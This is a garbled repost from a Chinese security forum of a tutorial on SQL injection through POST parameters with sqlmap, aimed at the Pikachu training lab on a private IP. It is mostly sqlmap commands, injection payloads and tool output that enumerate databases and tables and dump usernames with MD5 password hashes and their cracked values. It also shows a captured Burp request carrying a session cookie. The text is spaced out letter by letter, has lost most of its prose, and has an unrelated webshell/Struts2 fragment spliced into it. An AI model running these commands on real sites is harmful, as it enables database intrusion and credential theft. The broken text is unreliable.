[22215] 2021-08-03_Sqlmap中POST注入的两种方式

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2021-08-03_Sqlmap中POST注入的两种方式 S q l m a p P O S T w e b   L e m o n S e c   2 0 2 1 - 0 8 - 0 3 1 B u r p S u i t e 2 - - d a t a i d s q l m a p   - u   " h t t p : / / 1 9 2 . 1 6 8 . 1 3 9 . 1 2 9 / p i k a c h u / v u l / s q l i / s q l i _ i d . p h p "   - - d a t a   " i d = 1 & s u b m i t = % E 6 % 9 F % A 5 % E 8 % A F % A 2 " [ 1 4 : 3 7 : 0 9 ]   [ I N F O ]   P O S T   p a r a m e t e r   ' i d '   i s   ' G e n e r i c   U N I O N   q u e r y   ( N U L L )   -   1   t o   2 0   c o l u m n s '   i n j e c t a b l e P O S T   p a r a m e t e r   ' i d '   i s   v u l n e r a b l e .   D o   y o u   w a n t   t o   k e e p   t e s t i n g   t h e   o t h e r s   ( i f   a n y ) ?   [ y / N ] s q l m a p   i d e n t i f i e d   t h e   f o l l o w i n g   i n j e c t i o n   p o i n t ( s )   w i t h   a   t o t a l   o f   4 6   H T T P ( s )   r e q u e s t s : - - - P a r a m e t e r :   i d   ( P O S T )         T y p e :   b o o l e a n - b a s e d   b l i n d         T i t l e :   A N D   b o o l e a n - b a s e d   b l i n d   -   W H E R E   o r   H A V I N G   c l a u s e         P a y l o a d :   i d = 1   A N D   9 4 4 2 = 9 4 4 2 & s u b m i t = % E 6 % 9 F % A 5 % E 8 % A F % A 2         T y p e :   e r r o r - b a s e d         T i t l e :   M y S Q L   > =   5 . 6   A N D   e r r o r - b a s e d   -   W H E R E ,   H A V I N G ,   O R D E R   B Y   o r   G R O U P   B Y   c l a u s e   ( G T I D _ S U B S E T )         P a y l o a d :   i d = 1   A N D   G T I D _ S U B S E T ( C O N C A T ( 0 x 7 1 7 a 7 1 7 8 7 1 , ( S E L E C T   ( E L T ( 4 1 9 4 = 4 1 9 4 , 1 ) ) ) , 0 x 7 1 7 0 7 1 7 6 7 1 ) , 4 1 9 4 ) & s u b m i t = % E 6 % 9 F % A 5 % E 8 % A F % A 2         T y p e :   t i m e - b a s e d   b l i n d         T i t l e :   M y S Q L   > =   5 . 0 . 1 2   A N D   t i m e - b a s e d   b l i n d   ( q u e r y   S L E E P )         P a y l o a d :   i d = 1   A N D   ( S E L E C T   2 4 9 4   F R O M   ( S E L E C T ( S L E E P ( 5 ) ) ) B U U Y ) & s u b m i t = % E 6 % 9 F % A 5 % E 8 % A F % A 2         T y p e :   U N I O N   q u e r y         T i t l e :   G e n e r i c   U N I O N   q u e r y   ( N U L L )   -   2   c o l u m n s         P a y l o a d :   i d = 1   U N I O N   A L L   S E L E C T  
C O N C A T ( 0 x 7 1 7 a 7 1 7 8 7 1 , 0 x 5 9 5 3 4 b 7 6 6 4 4 6 4 e 6 4 6 f 4 1 4 f 4 e 5 4 6 e 6 c 7 2 4 5 5 4 4 8 4 7 6 4 4 7 6 3 6 f 5 0 5 7 4 a 7 5 4 3 4 9 7 1 5 1 4 a 4 8 6 f 6 d 7 2 4 a 6 6 4 e , 0 x 7 1 7 0 7 1 7 6 7 1 ) , N U L L - -   - & s u b m i t = % E 6 % 9 F % A 5 % E 8 % A F % A 2 - - - [ 1 4 : 3 7 : 1 6 ]   [ I N F O ]   t h e   b a c k - e n d   D B M S   i s   M y S Q L w e b   a p p l i c a t i o n   t e c h n o l o g y :   P H P   5 . 4 . 4 5 ,   N g i n x   1 . 1 5 . 1 1 ,   P H P b a c k - e n d   D B M S :   M y S Q L   > =   5 . 6 [ 1 4 : 3 7 : 1 6 ]   [ I N F O ]   f e t c h e d   d a t a   l o g g e d   t o   t e x t   f i l e s   u n d e r   ' / r o o t / . l o c a l / s h a r e / s q l m a p / o u t p u t / 1 9 2 . 1 6 8 . 1 3 9 . 1 2 9 ' s q l m a p   - u   " h t t p : / / 1 9 2 . 1 6 8 . 1 3 9 . 1 2 9 / p i k a c h u / v u l / s q l i / s q l i _ i d . p h p "   - - d a t a   " i d = 1 & s u b m i t = % E 6 % 9 F % A 5 % E 8 % A F % A 2 "   - - d b s [ 1 4 : 4 2 : 0 1 ]   [ I N F O ]   t h e   b a c k - e n d   D B M S   i s   M y S Q L w e b   a p p l i c a t i o n   t e c h n o l o g y :   N g i n x   1 . 1 5 . 1 1 ,   P H P ,   P H P   5 . 4 . 4 5 b a c k - e n d   D B M S :   M y S Q L   > =   5 . 6 [ 1 4 : 4 2 : 0 1 ]   [ I N F O ]   f e t c h i n g   d a t a b a s e   n a m e s a v a i l a b l e   d a t a b a s e s   [ 1 0 ] : [ * ]   c h a l l e n g e s [ * ]   d v w a [ * ]   i n f o r m a t i o n _ s c h e m a [ * ]   m y s q l [ * ]   p e r f o r m a n c e _ s c h e m a [ * ]   p i k a c h u [ * ]   s e c u r i t y [ * ]   s y s [ * ]   w w w _ d g d g _ c o m [ * ]   w w w _ z m _ c o m [ 1 4 : 4 2 : 0 1 ]   [ I N F O ]   f e t c h e d   d a t a   l o g g e d   t o   t e x t   f i l e s   u n d e r   ' / r o o t / . l o c a l / s h a r e / s q l m a p / o u t p u t / 1 9 2 . 1 6 8 . 1 3 9 . 1 2 9 '     s q l m a p   - u   " h t t p : / / 1 9 2 . 1 6 8 . 1 3 9 . 1 2 9 / p i k a c h u / v u l / s q l i / s q l i _ i d . p h p "   - - d a t a   " i d = 1 & s u b m i t = % E 6 % 9 F % A 5 % E 8 % A F % A 2 "   - D   p i k a c h u   - - t a b l e s
1 4 : 4 4 : 0 8 ]   [ I N F O ]   t h e   b a c k - e n d   D B M S   i s   M y S Q L w e b   a p p l i c a t i o n   t e c h n o l o g y :   P H P ,   P H P   5 . 4 . 4 5 ,   N g i n x   1 . 1 5 . 1 1 b a c k - e n d   D B M S :   M y S Q L   > =   5 . 6 [ 1 4 : 4 4 : 0 8 ]   [ I N F O ]   f e t c h i n g   t a b l e s   f o r   d a t a b a s e :   ' p i k a c h u ' D a t a b a s e :   p i k a c h u [ 5   t a b l e s ] + - - - - - - - - - - + |   m e m b e r       | |   h t t p i n f o   | |   m e s s a g e     | |   u s e r s         | |   x s s b l i n d   | + - - - - - - - - - - + [ 1 4 : 4 4 : 0 8 ]   [ I N F O ]   f e t c h e d   d a t a   l o g g e d   t o   t e x t   f i l e s   u n d e r   ' / r o o t / . l o c a l / s h a r e / s q l m a p / o u t p u t / 1 9 2 . 1 6 8 . 1 3 9 . 1 2 9 ' s q l m a p   - u   " h t t p : / / 1 9 2 . 1 6 8 . 1 3 9 . 1 2 9 / p i k a c h u / v u l / s q l i / s q l i _ i d . p h p "   - - d a t a   " i d = 1 & s u b m i t = % E 6 % 9 F % A 5 % E 8 % A F % A 2 "   - D   p i k a c h u   - T   u s e r s   - - c o l u m n s [ 1 4 : 5 1 : 1 8 ]   [ I N F O ]   t h e   b a c k - e n d   D B M S   i s   M y S Q L w e b   a p p l i c a t i o n   t e c h n o l o g y :   P H P ,   P H P   5 . 4 . 4 5 ,   N g i n x   1 . 1 5 . 1 1 b a c k - e n d   D B M S :   M y S Q L   > =   5 . 6
P O S T 1 B u r p S u i t e 1 . t x t b a c k - e n d   D B M S :   M y S Q L   > =   5 . 6 [ 1 4 : 5 1 : 1 8 ]   [ I N F O ]   f e t c h i n g   c o l u m n s   f o r   t a b l e   ' u s e r s '   i n   d a t a b a s e   ' p i k a c h u ' D a t a b a s e :   p i k a c h u T a b l e :   u s e r s [ 4   c o l u m n s ] + - - - - - - - - - - + - - - - - - - - - - - - - - - - - - + |   C o l u m n       |   T y p e                           | + - - - - - - - - - - + - - - - - - - - - - - - - - - - - - + |   l e v e l         |   i n t ( 1 1 )                     | |   i d               |   i n t ( 1 0 )   u n s i g n e d   | |   p a s s w o r d   |   v a r c h a r ( 6 6 )             | |   u s e r n a m e   |   v a r c h a r ( 3 0 )             | + - - - - - - - - - - + - - - - - - - - - - - - - - - - - - + [ 1 4 : 5 1 : 1 8 ]   [ I N F O ]   f e t c h e d   d a t a   l o g g e d   t o   t e x t   f i l e s   u n d e r   ' / r o o t / . l o c a l / s h a r e / s q l m a p / o u t p u t / 1 9 2 . 1 6 8 . 1 3 9 . 1 2 9 ' s q l m a p   - u   " h t t p : / / 1 9 2 . 1 6 8 . 1 3 9 . 1 2 9 / p i k a c h u / v u l / s q l i / s q l i _ i d . p h p "   - - d a t a   " i d = 1 & s u b m i t = % E 6 % 9 F % A 5 % E 8 % A F % A 2 "   - D   p i k a c h u   - T   u s e r s   - - d u m p   " u s e r n a m e , p a s s w o r d D a t a b a s e :   p i k a c h u                                                                                                                                                 T a b l e :   u s e r s [ 3   e n t r i e s ] + - - - - + - - - - - - - - - + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - + - - - - - - - - - - + |   i d   |   l e v e l       |   p a s s w o r d                                                                     |   u s e r n a m e   | + - - - - + - - - - - - - - - + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - + - - - - - - - - - - + |   1     |   1               |   e 1 0 a d c 3 9 4 9 b a 5 9 a b b e 5 6 e 0 5 7 f 2 0 f 8 8 3 e   ( 1 2 3 4 5 6 )   |   a d m i n         | |   2     |   2               |   6 7 0 b 1 4 7 2 8 a d 9 9 0 2 a e c b a 3 2 e 2 2 f a 4 f 6 b d   ( 0 0 0 0 0 0 )   |   p i k a c h u     | |   3     |   3               |   e 9 9 a 1 8 c 4 2 8 c b 3 8 d 5 f 2 6 0 8 5 3 6 7 8 9 2 2 e 0 3   ( a b c 1 2 3 )   |   t e s t           | + - - - - + - - - - - - - - - + - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - + - - - - - - - - - - + [ 1 4 : 5 6 : 0 8 ]   [ I N F O ]   t a b l e   ' p i k a c h u . u s e r s '   d u m p e d   t o   C S V   f i l e   ' / r o o t / . l o c a l / s h a r e / s q l m a p / o u t p u t / 1 9 2 . 1 6 8 . 1 3 9 . 1 2 9 / d u m p / p i k a c h u / u s e r s . c s v '                                                                                                 [ 1 4 : 5 6 : 0 8 ]   [ I N F O ]   f e t c h e d   d a t a   l o g g e d   t o   t e x t   f i l e s   u n d e r   ' / r o o t / . l o c a l / s h a r e / s q l m a p / o u t p u t / 1 9 2 . 1 6 8 . 1 3 9 . 1 2 9 ' P O S T   / p i k a c h u / v u l / s q l i / s q l i _ i d . p h p   H T T P / 1 . 1 H o s t :   1 9 2 . 1 6 8 . 1 3 9 . 1 2 9 C o n t e n t - L e n g t h :   3 0
2 3 4 5 s h e l l | 穿   w e b s h e l l K 8 S t r u t s 2 L e m o n S e c C o n t e n t - L e n g t h :   3 0 C a c h e - C o n t r o l :   m a x - a g e = 0 U p g r a d e - I n s e c u r e - R e q u e s t s :   1 O r i g i n :   h t t p : / / 1 9 2 . 1 6 8 . 1 3 9 . 1 2 9 C o n t e n t - T y p e :   a p p l i c a t i o n / x - w w w - f o r m - u r l e n c o d e d U s e r - A g e n t :   M o z i l l a / 5 . 0   ( W i n d o w s   N T   1 0 . 0 ;   W i n 6 4 ;   x 6 4 )   A p p l e W e b K i t / 5 3 7 . 3 6   ( K H T M L ,   l i k e   G e c k o )   C h r o m e / 8 4 . 0 . 4 1 4 7 . 1 0 5   S a f a r i / 5 3 7 . 3 6 A c c e p t :   t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , i m a g e / w e b p , i m a g e / a p n g , * / * ; q = 0 . 8 , a p p l i c a t i o n / s i g n e d - e x c h a n g e ; v = b 3 ; q = 0 . 9 R e f e r e r :   h t t p : / / 1 9 2 . 1 6 8 . 1 3 9 . 1 2 9 / p i k a c h u / v u l / s q l i / s q l i _ i d . p h p A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e A c c e p t - L a n g u a g e :   z h - C N , z h ; q = 0 . 9 C o o k i e :   P H P S E S S I D = 6 t 4 b b 3 n b 4 r a r q o d 4 j 0 7 3 m 0 3 8 h 4 C o n n e c t i o n :   c l o s e i d = 1 & s u b m i t = % E 6 % 9 F % A 5 % E 8 % A F % A 2 s q l m a p   - r   / h o m e / a i y o u / / 1 . t x t   - - d b s - r s q l m a p   - r   / h o m e / a i y o u / / 1 . t x t   - D   p i k a c h u   - - t a b l e s s q l m a p   - r   / h o m e / a i y o u / / 1 . t x t   - D   p i k a c h u   - T   u s e r s   - - c o l u m n s s q l m a p   - r   / h o m e / a i y o u / / 1 . t x t   - D   p i k a c h u   - T   u s e r s   - - d u m p   " u s e r n a m e , p a s s w o r d "
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则